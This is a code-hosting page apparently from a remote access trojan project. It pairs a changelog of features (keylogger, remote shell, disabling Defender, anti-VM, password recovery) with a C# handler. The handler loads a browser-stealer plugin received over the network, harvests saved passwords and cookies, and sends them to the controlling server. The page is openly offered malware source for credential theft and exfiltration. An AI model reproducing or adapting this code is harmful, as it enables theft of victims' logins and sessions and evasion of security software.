-Added report window -Added save keylogger -Added save remote desktop images -Added PC options -Updated password recovery -Updated ProcessCritical -Updated UI to remote shell -Updated disable defender -Updated anti VM -Updated client ID method -Fixed chat -Fixed send to memory -Specail thanks to @MrDevBot and @Thoxy67
37 lines
1.4 KiB
C#
37 lines
1.4 KiB
C#
using Client.MessagePack;
|
|
using Client.Sockets;
|
|
using System;
|
|
using System.Collections.Generic;
|
|
using System.Linq;
|
|
using System.Reflection;
|
|
using System.Text;
|
|
using System.Diagnostics;
|
|
namespace Client.Handle_Packet
|
|
{
|
|
public class HandlerRecovery
|
|
{
|
|
public HandlerRecovery(MsgPack unpack_msgpack)
|
|
{
|
|
try
|
|
{
|
|
// DLL StealerLib => gitlab.com/thoxy/stealerlib
|
|
Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
|
|
MethodInfo meth = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCredential");
|
|
MethodInfo meth2 = loader.GetType("StealerLib.Browsers.CaptureBrowsers").GetMethod("RecoverCookies");
|
|
object InjObj = loader.CreateInstance(meth.Name);
|
|
MsgPack msgpack = new MsgPack();
|
|
msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
|
|
msgpack.ForcePathObject("Password").AsString = (string)meth.Invoke(InjObj, null);
|
|
msgpack.ForcePathObject("Cookies").AsString = (string)meth2.Invoke(InjObj, null);
|
|
ClientSocket.Send(msgpack.Encode2Bytes());
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Debug.WriteLine(ex.Message);
|
|
Packet.Error(ex);
|
|
}
|
|
return;
|
|
}
|
|
}
|
|
}
|